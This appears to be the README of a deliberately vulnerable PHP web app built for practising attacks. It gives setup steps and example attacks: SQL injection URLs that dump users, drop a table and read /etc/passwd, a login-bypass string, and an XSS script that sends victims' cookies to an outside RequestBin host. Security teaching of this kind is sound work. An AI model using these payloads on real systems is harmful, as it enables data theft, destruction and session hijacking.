A collection of common web programming mistakes.
This website, when set up and configured, contains a number of vulnerabilities that can be exploited, including:
- SQL Injection
- XSS (Cross-Site Scripting)
- Session Hijacking
You'll need to have a web server installed and configured with PHP for this to work. I really recommend XAMPP, especially for Windows users. Once you've done that you can proceed.
You'll also need Node.js and npm installed and working.
Clone the project down and open the folder in your favourite editor. It's a JetBrains PhpStorm project but you can use whichever paid/free software takes your fancy.
First, install the npm packages necessary to build and run the website. Run the following in your terminal in the project root directory:
npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:
bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:
gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch
in a terminal to watch for file changes and compile accordingly.
To set everything up, you'll need to:
- Import the file
db.sql
into your database - Modify the file
db_configuration.php
to correspond to your database - Access the site and get hacking
Examples of vulnerabilities in this web application include:
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).
- Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
- Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
- Dump the password hash file from the server:
- Unix:
http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
- Unix:
- Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:
foo' or '1'='1
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }}
substituted out for your RequestBin bin ID).
<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>
This site is intentionally left vulnerable to common exploits. Don't host it on the same server as any production sites, only ever deploy it on a machine that you wouldn't mind bricking (I recommend a disposable VM).
This is heavily based on the php-sploits repository by Jared Mooring and Allan Shone. Find the slides for their SydPHP talk here.
The homepage template is a highly modified version of the Blackrock Digital Freelancer template. Wonderful, free, MIT licensed template. Check it out if you're in the market for such a thing.